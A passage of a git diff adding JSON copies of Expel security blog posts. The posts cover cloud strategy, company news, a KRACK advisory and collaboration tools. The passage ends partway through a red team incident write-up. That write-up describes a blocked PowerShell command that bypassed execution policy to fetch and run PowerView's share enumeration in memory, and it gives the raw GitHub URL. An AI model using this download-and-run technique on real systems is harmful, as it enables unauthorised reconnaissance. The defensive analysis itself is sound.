anyway. So, your security apparatus can\u2019t be static either. Looking for a place to start? Once you get to the \u201cacceptance\u201d phase for #1 above, evaluate how well your existing tools are being maintained and address those gaps first. Work down the list from there. As you press forward with this journey, realize that change will be constant. Optimizing for this along the way will help ensure your security toolset adapts to your changing needs. Your security analysts will thank you for it. This is the first part of a five part series on key areas of focus to improve security team retention. Read the introduction, 5 ways to keep your security nerds happy , or continue to part two ." +} \ No newline at end of file diff --git a/getting-a-grip-on-your-cloud-security-strategy.json b/getting-a-grip-on-your-cloud-security-strategy.json new file mode 100644 index 0000000000000000000000000000000000000000..b38bb3c70aa9bbd3075987e85c08c964a0abda51 --- /dev/null +++ b/getting-a-grip-on-your-cloud-security-strategy.json @@ -0,0 +1,6 @@ +{ + "title": "Getting a grip on your cloud security strategy", + "url": "https://expel.com/blog/getting-a-grip-on-your-cloud-security-strategy/", + "date": "Oct 9, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG Getting a grip on your cloud security strategy Security operations \u00b7 7 MIN READ \u00b7 JEN BIELSKI \u00b7 OCT 9, 2018 \u00b7 TAGS: Cloud security / How to / Overview / Planning Add up all of those selfies, food photos and iCloud backups and it\u2019s no surprise that consumer cloud usage has increased 50% in the past five years. Companies are hot on their tail. In the past seven years, the number of organizations with at least one application or a portion of their infrastructure in the cloud has increased from 51% to 73% . Ready or not, the cloud is here. But what does that mean for security? What\u2019s old is new (again) It\u2019s Groundhog Day! Or maybe Groundhog Decade? Cloud security today looks a lot like where \u201ctraditional\u201d on-prem security was 10 or 15 years ago. Most people are just starting to think through how they\u2019re going to build a security program around this new perimeter. For most, that starts with figuring out where their data is (\u2026 especially their sensitive data). Unfortunately, we can\u2019t just rinse and repeat what we did 15 years ago. While some things are the same, more has changed. User accounts are the new endpoints. Attackers can compromise your data without coming anywhere near your network. They just need to compromise a single user account. That\u2019s a lot less work than popping a box, moving laterally and performing reconnaissance before they steal the data. It also means your focus needs to expand from \u201cwhere are my endpoints\u201d to \u201cwhat are my users doing?\u201d Questions like \u201care my users logging in from places I don\u2019t expect them to?\u201d and \u201cdoes this user have permission to access sensitive data\u201d will uncover a lot more evildoers than looking for malware. Those front-row seats now come with an obstructed view. You can\u2019t point to the box that has your \u201ccrown jewels\u201d anymore. In fact, you\u2019re no longer in full control of the walls that are protecting your data. That limited visibility means you\u2019ve got to try a little harder to see the things that were once right in front of you. Speaking of control, it\u2019s important to understand where the responsibility line is. What will your cloud vendor do vs. what do you need to care about? You need some new plays \u2026 and probably a whole new playbook. Coming up with a cloud security strategy is a little like playing a new game while the rules are being written. What\u2019s OK for employees to do and thus what security needs to care about is in flux. For example, employees can upload and share a document in minutes with applications like Box, Dropbox and OneDrive. That\u2019s convenient, but it also makes it easy for copies of your sensitive data to fly away. When it comes to the infrastructure, IT teams can \u201cflip the switch\u201d and spin up a new server or storage bucket. Policies to mitigate these new risks are playing catch-up and security is often left in the position of highlighting \u201cweird stuff\u201d that\u2019s going on so that someone can do something about it. Getting a grip on your cloud security strategy It\u2019s easy to try to push a round peg (traditional security) into a square hole (cloud security). It\u2019s what you know and it\u2019s routine. Plus, finding the time to focus on strategy can be hard. Understanding how to think about cloud security differently is half the battle. At Expel, we\u2019ve thought a lot about it, and we\u2019ve identified three key points that should inform your cloud strategy. 1. It\u2019s part of your risk profile It can be unsettling when you ship your data to the cloud. It\u2019s easy to fall into the trap of assuming that just because you shipped it to a big-name vendor like Microsoft or Google that \u201cthey\u2019ve got security covered.\u201d If your data lives in the cloud then it\u2019s part of your perimeter. And if it\u2019s part of your perimeter, then it\u2019s another home on your plot of land to protect. That means you\u2019ve got to include it in your risk profile. In the good old days, you could put a firewall around it and feel reasonably secure. But you can\u2019t put a traditional firewall around cloud applications like G Suite and O365. So you\u2019ll need a strategy to mitigate the risk. The nice thing is that your cloud providers are responsible for things like infrastructure and networking. But in order to assess your risk, one of the key things you need to understand is where their responsibilities end and yours begin. Of course, you\u2019re responsible for what you put in the cloud, including your applications and data. But what else? Failing to understand where that line is can create holes in your risk profile and leave the gate open for an attacker (or employee) to steal or misuse sensitive documents. 2. It requires special focus It may be tempting to just take the logs from your cloud infrastructure and apps, send it to your SIEM and stir. Unfortunately, that won\u2019t get you very far. Why? The data you need to look at and the questions you need to ask are different. As I mentioned above, users are the new endpoints. So\u2026instead of looking for unusual endpoint behavior, a security analyst needs to look for unusual user behavior. And once they detect suspicious activity, they need to look for clues under rocks they haven\u2019t turned over before \u2013 like AWS CloudTrail or O365 audit logs. Here\u2019s a quick example that illustrates what I\u2019m talking about. Shortly after onboarding a customer we detected a phishing attempt in their O365 environment. The phishing email came from a legitimate user. But once we dug deeper into the audit logs we discovered the attacker had changed a mailbox rule to evade detection and then sent out hundreds of emails without anyone noticing. This discovery allowed us to develop a new rule to detect similar activity in the future. The detection, investigation and future preventive steps were all unique to the cloud (and in some cases, unique to O365). That\u2019s what we mean by special focus. 3. Cloud security has multiple parts When it comes to the cloud, it\u2019s not a monolith. It\u2019s more like triplets. There are different parts to think about. They\u2019re all vying for your attention and you need to think about them differently. If you only focus on one \u2013 such as securing your cloud apps \u2013 you may be leaving the door to your cloud infrastructure unlocked for an attacker to walk right through. At Expel, we break cloud security into three different parts: cloud applications like O365, cloud infrastructure (aka \u201cservers in the sky\u201d) and highly elastic cloud infrastructure where you\u2019re auto scaling your servers based on load. Breaking cloud security into three parts Cloud applications Cloud infrastructure Elastic infrastructure Sample applications Office 365 Salesforce Okta AWS Azure Google Cloud AWS AutoScale Kubernetes What they are Software programs that are hosted in the cloud. If you log in to a website to use it, that\u2019s a cloud app. If you install it on your own hard drive, it\u2019s not. A collection of servers, containers and virtual machines that are hosted by a third party. We call them \u201cservers in the sky.\u201d Basically, if your servers aren\u2019t running in your own data center (or closet) you\u2019re probably using cloud infrastructure. An environment where you\u2019re rapidly provisioning and de-provisioning servers and other resources based on spikes in end user demand. What\u2019s special about them You\u2019ve got less control and visibility over what users are doing and what data about their activity is available. You\u2019ve got less visibility into what\u2019s happening and how the infrastructure might get compromised. You need to understand how your applications behave and have visibility into what they\u2019re doing at any point in time. Detection questions to ask If a user logs in from Los Angeles and three hours later logs in from Beijing, is this physically possible? Are your S3 buckets configured correctly? Did a user just upload sensitive data that is visible to the world? Are any of your servers reaching outside of your network? Each of these three approaches is so special that we\u2019ll be publishing a separate blog post on each of them to dive into the details (so subscribe to our blog! ). But for now, it\u2019s important to note that you need to approach each of these three parts of \u201cthe cloud\u201d differently than you treat your on-prem data and apps. So \u2026 where do you start? If you\u2019re reading this and saying to yourself \u201cthat all sounds nice, but how do I get started?\u201d you\u2019re not alone. In fact, you\u2019re in good company. Here are a few ideas to help point you in the right direction: Inventory your cloud apps (and risk). Things like Office 365, Workday, Salesforce and ServiceNow are the obvious place to start. But chances are, there are dozens of different cloud apps in use across your company. Make a list and then rank them by risk. How bad would it be if an account were compromised or data was stolen from the app? Catalog all of your sensitive data (no matter where it is). With the march to the cloud all of your sensitive data probably isn\u2019t where you think it is. So go find it \u2026 even if you\u2019ve got to send out a search party. Figure out what cloud security data you\u2019ve got. Chances are, you can use a lot of the investments you already have. So map the signals you get from your existing security tech against the risks you\u2019ve identified. Do you have the right logs for things like user authentication? Data access? Where do those logs go and can you get alerts from them? Can you perform historical queries? Put some basic controls in place. If you\u2019ve completed the previous two steps you\u2019ll have a good grasp on what your cloud-informed risk profile looks like. And there are some basic things you can put in place even while you\u2019re working on your broader cloud security strategy. For example, put identity management controls in place. Limit access to tasks like spinning up an S3 bucket in Amazon. Make sure that people who have admin access need it. And lock down login permissions by, for example, blocking logins from unusual IP locations. Implement two-factor authentication. This is a no-brainer and yet it\u2019s amazing how many organizations don\u2019t do it. If your cloud apps offer two-factor authentication, make it mandatory. Period. Invest in training. As we\u2019ve mentioned before, learning is fundamental . The cloud is a new frontier and securing your apps and data that live there requires new skills. Get your team closer to your developers. And, if you have some, send them to a conference or a class. Allocate time and budget for them to play around with cloud-specific tech. Finally, if you\u2019re looking to increase understanding across your organization of the need to beef up your approach to cloud security it might be useful to run an incident response tabletop exercise. There\u2019s nothing like running through a real-life scenario to identify gaps, improve workflows and highlight areas that need new investment that can make you better prepared for when an incident does occur. And if you\u2019re having trouble getting people to attend, you might consider turning it into a game . Of course, if you come to the conclusion you need someone to monitor your cloud apps and infrastructure, we\u2019re always happy to help :-)." +} \ No newline at end of file diff --git a/good-news-in-unusual-times-cybersecurity-company.json b/good-news-in-unusual-times-cybersecurity-company.json new file mode 100644 index 0000000000000000000000000000000000000000..eff7854130284abc1b8b9b713afbcc2eaa84d30d --- /dev/null +++ b/good-news-in-unusual-times-cybersecurity-company.json @@ -0,0 +1,6 @@ +{ + "title": "Good news in unusual times - Cybersecurity Company ...", + "url": "https://expel.com/blog/good-news-in-unusual-times/", + "date": "May 13, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Good news in unusual times Expel insider \u00b7 3 MIN READ \u00b7 DAVE MERKEL, YANEK KORFF AND JUSTIN BAJKO \u00b7 MAY 13, 2020 \u00b7 TAGS: Announcement / Company news / Managed security You\u2019re probably expecting a pithy introduction to this blog post. And under normal circumstances, we\u2019d have one waiting for you. However, that tongue-in-cheek intro doesn\u2019t feel right given what\u2019s happening in our world right now. Which is why today we\u2019re going to cut straight to the heart of what we want to share. We\u2019re incredibly grateful and humbled to tell you that we\u2019ve raised a new round of funding. This time, our $50 Million Series D financing was led by CapitalG , Alphabet\u2019s independent growth fund, with participation from many of our existing investors : Battery Ventures, Greycroft, Index Ventures, Paladin Capital Group and Scale Venture Partners. We\u2019re thankful that we get to continue on our journey to change the face of managed security \u2013 taking great care of our customers and our own crew along the way. And while we\u2019re celebrating this news because it\u2019s good for the businesses we help protect every day and the employees who\u2019ve joined us on this journey, celebrating while there\u2019s an incredible amount of uncertainty in the world feels a bit uncomfortable. It\u2019s not lost on us how fortunate we are. Our hope is that with this new round of funding, we can continue to serve our customers (and add new ones to the Expel family) to the best of our abilities, making space for them to do more than chase alerts \u2026 at a time when they need that flexibility the most. Making space for teams to do what they love about security When we founded Expel nearly four years ago, we set out to provide our customers with greater peace of mind about security \u2013 whether they\u2019re operating \u201cbusiness as usual\u201d or facing more challenging circumstances. Our team had some initial core beliefs about the state of managed security that inspired us to build something different, and our customers have helped us confirm those beliefs: They want a security partner who\u2019ll give them answers to solve their most pressing security challenges, not just toss them a handful of alerts and say, \u201cYou should really look into those.\u201d They want a tech-first approach to security, ideally where they can get value right away from the tools they already own versus being told to go buy new ones (we love the \u201cBYO tech\u201d approach too). More than anything, they want to get better and keep their companies secure, all while maintaining their own sanity and their team\u2019s \u2026 because anyone who has worked in security for any length of time knows that stress and burnout are very real. During initial conversations about what we wanted the Expel brand to be \u2013 years ago when we were all gathered around a table in Merk\u2019s barn \u2013 we tossed around this idea of \u201cmaking space\u201d for our customers to do what they love about security. Since then, we\u2019ve been thankful to hear directly from our customers about how we\u2019ve supported them in \u201cmaking space.\u201d One of the more gratifying comments came from the CISO at a high-growth tech company who recently told us this: \u201cI get 8+ hours of sleep a night and my child recognizes me as their father again thanks to Expel.\u201d There couldn\u2019t be a better time than now to help our customers make space, whether it\u2019s to work on more strategic security priorities for their business, support loved ones or care for their own health. The road ahead We know that so many are facing difficult times right now. We\u2019re optimistic, though, that the light at the end of the tunnel will ultimately be bright. We\u2019re incredibly grateful for this new round of funding, and look forward to continuing to serve our customers and take care of our own crew of Expletives. Thank you to everyone who\u2019s supported us on this journey so far: our employees, customers, partners, investors, family and friends. If there\u2019s one thing all of us wholeheartedly agree on, it\u2019s that we\u2019re privileged to work alongside such incredible people every day. It\u2019s times like these that make us really appreciate that." +} \ No newline at end of file diff --git a/got-workloads-in-microsoft-azure-read-this.json b/got-workloads-in-microsoft-azure-read-this.json new file mode 100644 index 0000000000000000000000000000000000000000..febe1f6af862da117c336884411642b37df27197 --- /dev/null +++ b/got-workloads-in-microsoft-azure-read-this.json @@ -0,0 +1,6 @@ +{ + "title": "Got workloads in Microsoft Azure? Read this", + "url": "https://expel.com/blog/workloads-in-microsoft-azure/", + "date": "Jan 19, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Got workloads in Microsoft Azure? Read this Security operations \u00b7 1 MIN READ \u00b7 PETER SILBERMAN, MATTHEW KRACHT AND MICHAEL BARCLAY \u00b7 JAN 19, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools Anyone who performs detection and response in the cloud knows that figuring out how to get the right signal for analysts to efficiently do their job is \u2026 challenging. Running workloads in Microsoft Azure is no exception. But once you get your head around what signals you should turn on and how you can use that data, alert and log data available natively in Azure can be a powerful tool to help you keep attackers out of your environment. Our guidebook will help you get started on building your Azure detection and response strategy, not to mention figure out the difference between the numerous sources of security signal in Azure. Download our brand new Azure guidebook: Building a detection and response strategy , where we\u2019ll talk about: The available sources of logging and alert data in Azure; How to categorize each Azure Defender Service and understand what they do; Fields that Expel found most useful in triaging anomalous alerts; and A few of the lessons we\u2019ve learned setting up Azure security signal (Hint: You can use these to inform and tweak your own security monitoring activities!). We\u2019ll walk you through the types of signal and logging sources that are available in Azure, share guidance on what signal you should consider turning on so your analysts get the information they need (and aren\u2019t bogged down with information they don\u2019t need), along with some considerations we\u2019ve identified as we built out our own Azure detection and response strategy. Sound helpful? We hope so! Download your copy now" +} \ No newline at end of file diff --git a/grab-your-sneaks-we-re-gearing-up-to-support-a-walk-for-a.json b/grab-your-sneaks-we-re-gearing-up-to-support-a-walk-for-a.json new file mode 100644 index 0000000000000000000000000000000000000000..2bbdba4cb91cfcfbe4fdece5446e707911330499 --- /dev/null +++ b/grab-your-sneaks-we-re-gearing-up-to-support-a-walk-for-a.json @@ -0,0 +1,6 @@ +{ + "title": "Grab your sneaks: we're gearing up to support a walk for a ...", + "url": "https://expel.com/blog/grab-your-sneaks-were-gearing-up-to-support-a-walk-for-a-cause/", + "date": "Oct 19, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Grab your sneaks: we\u2019re gearing up to support a walk for a cause Expel insider \u00b7 1 MIN READ \u00b7 CANDICE BRISTOW \u00b7 OCT 19, 2022 \u00b7 TAGS: Company news At Expel, we love October. Coffee flavors are better. We get to celebrate Cybersecurity Awareness Month . Halloween! And it\u2019s time for the annual Skechers Pier to Pier Friendship Walk . This event brings thousands together in California for a walk from Manhattan Beach Pier to Hermosa Beach Pier, and back, culminating in a day of celebrations. Co-produced by the Skechers Foundation and the Friendship Foundation , the walk raises money in support of children with disabilities and their families, and also to support public education and a national college scholarship program\u2014funding one-on-one peer mentoring and social recreational activities, including summer camps, sporting events, cooking classes, music lessons, and more. Expel is a proud \u201cdigital swag\u201d sponsor of this year\u2019s walk. We\u2019re always thrilled to see our customers involved in initiatives that reflect our own values, and we\u2019re so excited by the chance to support Skechers in this cause. The idea that we\u2019re \u201cbetter when different\u201d is a core value at Expel. Since the beginning, we\u2019ve worked hard to build an inclusive and welcoming place where people can do great work and where every person feels they can show up authentically. Our goal is to create a space for people to do what they love while strengthening our company regardless of race, gender, age, disability status, or any aspect of their identity or role. We\u2019re a stronger organization when we recognize, celebrate, and learn from those whose backgrounds and perspectives are different from our own. We believe that actively nurturing a culture of equity, inclusivity, and belonging is essential for our success, and we support those working with a broader spectrum of diversity, including these efforts by Skechers and the Friendship Foundation. On October 30, our own Jenn Karlsson (hey, Jenn ) will be at the Manhattan Beach Pier to join in on the fun. Follow along on social media ( @expel_io , @skechersp2pwalk , and @thefriendshipfoundation ) for pics from the day and to learn more about how you can participate in this life-changing initiative." +} \ No newline at end of file diff --git a/head-and-business-in-the-uk-cloud-s-we-can-help.json b/head-and-business-in-the-uk-cloud-s-we-can-help.json new file mode 100644 index 0000000000000000000000000000000000000000..7459643b02e8c9f8e17f1fa011cee7e442a985a3 --- /dev/null +++ b/head-and-business-in-the-uk-cloud-s-we-can-help.json @@ -0,0 +1,6 @@ +{ + "title": "Head\u2014and business\u2014in the UK cloud(s)? We can help.", + "url": "https://expel.com/blog/head-and-business-in-the-uk-clouds-we-can-help/", + "date": "Mar 6, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Head\u2014and business\u2014in the UK cloud(s)? We can help. Expel insider \u00b7 2 MIN READ \u00b7 CHRIS WAYNFORTH \u00b7 MAR 6, 2023 \u00b7 TAGS: Company news Expel is making its UK trade show debut at the Cloud & Cyber Security Expo , 8th \u2013 9th March, and we\u2019re absolutely buzzing about it\u2014to say the least. Why? Glad you asked. Aside from the chance to grab a pint with our peers in the security space, we\u2019re looking forward to talking shop on all things cloud, because that\u2019s a language we speak fluently. In fact, our cloud detections are specific to Google Cloud Platform (GCP), Google Kubernetes Engine (GKE), Microsoft Azure, Amazon Web Services (AWS), and Amazon Elastic Kubernetes Engine (EKS). This means we can quickly detect and remediate the risks you\u2019d otherwise miss, whether attacks originate in the cloud, Kubernetes (k8s), SaaS apps, or even on-prem. We give the answers and outcomes you need to secure your cloud accurately and quickly. (Did we mention 98% of Expel\u2019s detections originated from a detection written by Expel?) Sidebar: If you\u2019re reading closely (we sure hope that you are), you might have noticed we mentioned Kubernetes. That\u2019s a pretty big deal for us\u2014or really any managed detection and response (MDR) provider\u2014because we just launched the general availability of Expel MDR for Kubernetes, the first-to-market offering of its kind. Learn all about it, including whether it\u2019s right for your org, here . Now, where were we\u2026 Right! Cloud security might be kind of our gig, but it certainly doesn\u2019t stop there. We help orgs of all shapes and sizes manage business risk. We use our technology, people, and expertise to provide businesses with security that makes sense. Expel Workbench\u2122, our security operations platform, lets us deliver clear answers and prescriptive advice to help your security team proactively identify and remediate vulnerabilities and threats\u2014and do it with a mean time to remediation (MTTR) of 22 minutes. Our managed security products transparently thwart attackers and breaches, giving you confidence that your business is secure, your security investments are working, and your teams are focused on business priorities\u2014not alerts. While you\u2019re at the Expo, swing by stand S-22 to meet our UK crew and schedule a demo if you want to see all this in action. We\u2019ll also send you home with a summary of our annual threat report, Great eXpeltations . It\u2019s brimming with cybersecurity trends and predictions, right from our security operations centre (SOC), and full of insights and data you can use. By the way, if you\u2019re around on March 8, join us for a drink at the Good Hotel from 4pm to wind down from the day. Details and how to RSVP here \u2026 See you there . Cheers!" +} \ No newline at end of file diff --git a/heads-up-wpa2-vulnerability.json b/heads-up-wpa2-vulnerability.json new file mode 100644 index 0000000000000000000000000000000000000000..4ff194cea4eefd221fc978a96890bdf7572b2c5d --- /dev/null +++ b/heads-up-wpa2-vulnerability.json @@ -0,0 +1,6 @@ +{ + "title": "Heads up: WPA2 vulnerability", + "url": "https://expel.com/blog/heads-wpa2-vulnerability/", + "date": "Oct 16, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG Heads up: WPA2 vulnerability Tips \u00b7 1 MIN READ \u00b7 BRUCE POTTER \u00b7 OCT 16, 2017 \u00b7 TAGS: Alert / Heads up / Vulnerability Re: the WPA2 vulnerability. Details here: https://www.krackattacks.com . The TL;DR is \u201cdon\u2019t flip out.\u201d This is an example of bug marketing and the infosec echo chamber getting way out in front of reality. Important bits There are multiple vulnerabilities. They all generally revolve around data decryption, injection, or replay. Attacks must be carried out on individual clients at a time. The attack does NOT affect all clients at once. Like any wireless attack, the attacker needs to be in relatively close proximity to execute. This VASTLY limits the attack surface as it\u2019s more costly and risky for an attacker to execute than traditional network-borne attacks. Traffic that is otherwise protected is fine (TLS for example). The author makes some broad claims that TLS sessions aren\u2019t secure b/c there are other attacks against TLS. That\u2019s an over generalization. The story is different for local protocols that lack strong encryption. Vendors have known about this attack since August. Microsoft has already patched and others have as well. You can track progress here . Ultimately, these vulnerabilities are mostly of concern to organizations that are targets of well resourced, highly motivated attackers since attackers have to be close to targets, actively injecting traffic, and then they would have to use that access to exploit some other system in order to gain access. Most organizations do not fall into that category and should patch this vulnerability in their normal patching cycles. No need to go crazy addressing this announcement. You likely have far more pressing matters that will impact the security of your organization more than worrying about KRACK. One takeaway from this vulnerability is the importance of the security of higher level protocols. TLS and VPNs run over wireless networks insulate your endpoints from compromises of the network infrastructure. Consider focusing your energies on ensuring your wireless networks run resilient layer 3+ protocols to protect from layer 2 shenanigans." +} \ No newline at end of file diff --git a/help-us-make-a-wish-come-true.json b/help-us-make-a-wish-come-true.json new file mode 100644 index 0000000000000000000000000000000000000000..0d1ac90dafe2dee31b4a18b962ffe3952991910c --- /dev/null +++ b/help-us-make-a-wish-come-true.json @@ -0,0 +1,6 @@ +{ + "title": "Help us make a wish come true", + "url": "https://expel.com/blog/help-us-make-a-wish-come-true/", + "date": "Apr 24, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Help us make a wish come true Expel insider \u00b7 1 MIN READ \u00b7 KAITLIN RICKETTS \u00b7 APR 24, 2023 \u00b7 TAGS: Company news We\u2019re pretty proud to count Make-A-Wish among our customers. In addition to the fantastic work they do in the U.S., they (and 30,000 volunteers) now grant wishes internationally in 50 countries on six continents through 40 affiliates. All told, they\u2019ve granted more than 550,000 wishes for children with critical illnesses worldwide since 1980. Every day, more than 35 wishes, on average, are granted throughout the U.S. and its territories. That\u2019s incredible. Now, let\u2019s make it even better. Expel is planning to make a donation to Make-A-Wish on World Wish Day, April 29. You can brighten a few more faces by sharing your story through a review on G2 by April 28. For each customer review received, we\u2019ll make a contribution to our donation goal of $10,000. (BTW, reviews are anonymous, and please, be 100% honest . Not only will you help us reach our goal, but your comments can inform decisions your peers in other organizations are making. And anonymous third-party insight is gold to us.) Expel works to actively nurture a culture of equity, inclusivity and belonging in everything we do. This means creating a safe place where everyone feels they\u2019re valued and that they belong. Everyone should be treated with kindness, and not many organizations do this better than Make-A-Wish. We\u2019re committed to helping them do even more, and we hope you\u2019ll help us reach our goal." +} \ No newline at end of file diff --git a/helpful-tools-for-technical-teams-to-collaborate-without.json b/helpful-tools-for-technical-teams-to-collaborate-without.json new file mode 100644 index 0000000000000000000000000000000000000000..492f0858e3cf9ca5c2721cd27d20af084f35666f --- /dev/null +++ b/helpful-tools-for-technical-teams-to-collaborate-without.json @@ -0,0 +1,6 @@ +{ + "title": "Helpful tools for technical teams to collaborate without ...", + "url": "https://expel.com/blog/helpful-tools-technical-teams/", + "date": "Mar 15, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Helpful tools for technical teams to collaborate without meetings Tips \u00b7 5 MIN READ \u00b7 PETER SILBERMAN \u00b7 MAR 15, 2022 \u00b7 TAGS: Tech tools The first week of March was Expel\u2019s quarterly Week Without Meetings (or WWOM \u2014 you can read about it here ). It\u2019s an experiment we ran in 2020 that\u2019s become a quarterly event we all look forward to. We ask everyone to cancel every internal meeting possible and encourage our team to use these weeks to work on projects they\u2019ve had to put to the side, do something for their professional development, and take time to focus on their well-being. The goal: be more intentional about the meetings we do schedule afterwards. Does that conversation really need a meeting? Or can we connect asynchronously over Slack or work together in a Google doc? As CTO, I find these weeks incredibly valuable. Even if I still have a few important conversations scheduled during my WWOM, removing all of our recurring meetings is a huge reprieve and allows for deep thought work time, catching up with other humans (yay), and a general change of pace. This past WWOM, as my team carried on working together without jumping on Zoom, I reflected on the tools and tricks we now use to reduce the burden of meetings on an ongoing basis while still communicating and collaborating across our team and org. Hopefully there\u2019s something here that can help with your team\u2019s \u201cmeeting mojo,\u201d as we like to call it, and create more time and space for your people and the work that excites them. Disclaimer: While Expel is a customer of several of the vendors I\u2019ll list here, we\u2019re in no way sponsored or being asked to write about them. These are genuinely tools I\u2019d want to use wherever I\u2019m working. Asynchronous feedback and collaboration One of the challenges with meetings, besides scheduling, is the imposition of asking people to bring their A game at a time you choose, or at a time that fits into most people\u2019s schedules. This is especially important when you\u2019re seeking collaboration \u2014 whether discussing feedback or brainstorming. I find those two types of asks carry a heavy cognitive load. If you\u2019re a morning person like me, your preference is likely to do that kind of work in the AM. If you aren\u2019t like me, you may prefer the late afternoon, which is when I\u2019m desperately in need of another coffee. Either way, the timing of specific types of meetings can have an impact on the capabilities people bring to the table. I\u2019ve found that offering asynchronous collaboration instead is an effective way to involve everyone you need at their own ideal time. To that end, Google docs are a great tool for async feedback and brainstorming. I know, truly novel, right? This probably isn\u2019t a surprise to many. But I want to talk about a common mistake I see made when collaborating on content. Project owners often don\u2019t anticipate that, with so many messages and docs swirling around, those coming into a shared doc may have forgotten the initial ask or may not recall the role they play in the ask. Are they bringing a customer perspective, editing for grammar, or thinking about how other teams will react? I\u2019ve found the easiest way to help with this is to start the doc with what you expect or need from reviewers and a reminder of how the content will be used. Here\u2019s a screenshot of a Google doc where I did just this: Key details for asynchronous collaboration in Google docs These details help each reviewer know where and how to focus their time and energy so they can provide the most useful feedback and prevent duplicative efforts. Asynchronous feedback and socialization The video tool Loom is one of my new favorite tools to combat meetings. Our team\u2019s using it in two ways. The first is perhaps more obvious \u2014 it\u2019s a great way to asynchronously socialize a concept, provide training, or present on a new topic. For example, our Principal Data Scientist Elisabeth Weber recorded two Loom videos called \u201cLearn to Rank,\u201d explaining how we use ranking at Expel. These videos can be watched by our team as they see fit at a good time for each of them to consume the concept. Loom also has metrics on how many people watched a video, and those watching can see comments left by previous viewers. This becomes really powerful when you present a concept that connects dots across multiple teams. Expel Learn to Rank Loom presentation video The second way we\u2019ve started to use Loom is for asynchronous feedback on presentation talk tracks. As someone who regularly has to present ideas to diverse audiences, I\u2019m constantly seeking feedback from different parts of the company to make sure I have a concise, complete, and compelling message while also avoiding any \u201cgotchas\u201d I may have missed. Loom is an amazing tool to use in the draft phase of presentation building. Recording talk tracks with slides and getting feedback from colleagues who can record their responses has been invaluable for building impactful presentations that get the right message across. Below is a screenshot of the most recent video I recorded \u2014 all of those talk bubbles are what we would call constructive feedback, and those emojis are what some would call trolling. Suffice it to say, I saved a lot of time by getting this feedback, deleting this presentation, and starting over \ud83d\ude42 Loom presentation feedback Socializing research outcomes When completing research, you can often be left wondering, \u201cHow do I start moving this through the larger org outside of my (research) team?\u201d There are different factors for success ( note to self: this could be a whole blog series, especially on what not to do from personal experience\u2026 ), but one of them is generating awareness and interest among other teams. Researchers know that doing the research is only half of the work \u2014 the other half is communicating, recommunicating, and moving the findings through your org. At Expel, we love Jupyter Notebooks for this. Specifically, structuring Notebooks to socialize completed research has helped us more easily translate that research into product features. We usually use slides in combination with a Notebook. Slides help us set the stage for why we did the research, remind everyone of our goals, discuss solutions and potential impacts, gotchas, etc. We then make the associated Notebook available for engineers or other internal researchers to play with the concepts in more depth. To successfully use Notebooks to socialize research, consider the following: Notebooks should be optimized for the reader to understand, not for the developer. This means you might have to violate the DRY (Do not Repeat Yourself) principals (oh em gee\u2026) Notebooks should be optimized for the reader to understand, not for porting to production. This means you might not have loops collapsed on one line (oh em gee again\u2026) Code should be well documented. Yes \u2013 prototypers, it\u2019s possible to have more than one comment per 100 lines of code \ud83d\ude42 Markdown cells should exist around code cells. The text in these cells isn\u2019t about the implementation of the code in the cell below (that\u2019s what comments are for). It\u2019s telling a story for the reader at a higher level, helping think about the cell relative to the research objective. Meeting mojo Our weeks without meetings are meant to shock the system and make us more intentional about our meeting choices. It\u2019s often the pause we need to rethink our meeting mojo and figure out how we can reduce the time and energy burden of meetings on ourselves and our teams going forward. That\u2019s where the tools I\u2019ve discussed come into play. If you\u2019ve read this far, hopefully you\u2019ve found one tip or tool you can carry forward into your day-to-day to reduce the meeting burden on yourself or your team. Have other tools that help you minimize meetings while still communicating and collaborating effectively? We\u2019d love to hear about them \u2014 drop us a note !" +} \ No newline at end of file diff --git a/how-a-red-team-went-from-domain-user-to-kernel-memory.json b/how-a-red-team-went-from-domain-user-to-kernel-memory.json new file mode 100644 index 0000000000000000000000000000000000000000..760ddb0354b9e8a7fecef1280c375b19d4e1da24 --- /dev/null +++ b/how-a-red-team-went-from-domain-user-to-kernel-memory.json @@ -0,0 +1,6 @@ +{ + "title": "How a red team went from domain user to kernel memory", + "url": "https://expel.com/blog/well-that-escalated-quickly-how-a-red-team-went-from-domain-user-to-kernel-memory/", + "date": "Jul 28, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Well that escalated quickly: How a red team went from domain user to kernel memory Security operations \u00b7 9 MIN READ \u00b7 BRITTON MANAHAN \u00b7 JUL 28, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools We\u2019re no strangers to red team engagements. In fact, we love them . Not only do they give our customers a chance to put our detection and response (D&R) skills to the test, they also let us exercise our incident response skills. And this red team definitely gave us a workout as they progressed towards full control of the computer system. Their goal was to evaluate our detection methodology and incident response (IR) proficiency; and they did so using a number of interesting and unique tools and techniques. The red team was given physical access to a computer on the customer\u2019s network and a valid domain user to unleash their havoc. We\u2019ll refer to the computer as \u201cCompromised_Host\u201d and the valid user account as \u201cUser1\u201d from here on out. The incident began with some PowerShell-based reconnaissance and ended with the red team loading custom code into kernel memory on the system \u2013 aka a rootkit. In this blog post, I\u2019ll walk you through the initial detection, our investigation and share the insights we uncovered along the way. Incoming! Threat detection TL; DR: We detected malicious PowerShell usage by the red team and notified the customer in eight minutes. Our initial lead into the red team activity began with an endpoint alert based on a lightly obfuscated PowerShell command that attempted to download the PowerView privilege escalation framework from the PowerShell Empire PowerTools Github repository. In the image below, you\u2019ll see that this attempted download and in-memory execution of malicious PowerShell was blocked by the EDR product deployed on Compromised_Host. Expel Alert Details Here\u2019s the full PowerShell process command line and the deobfuscated remote URL: PowerShell Command for Alert When the URL is deobfuscated it appears as: https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1 Our analysts quickly determined this alert to be a true positive because: The command line parameter \u201c-ep Bypass\u201d bypasses any Script Execution Policy restrictions in place for the generated PowerShell process. The command downloads reconnaissance functionality from the well-known post-exploitation framework repository PowerShellEmpire. After the download completes, the command runs an imported function, Invoke-ShareFinder, with a parameter telling it to enumerate all network file shares readable by the current user. The download and execution of this function, Invoke-ShareFinder, intentionally operates exclusively in working memory and does not get stored to persistent storage (although the output does). If this 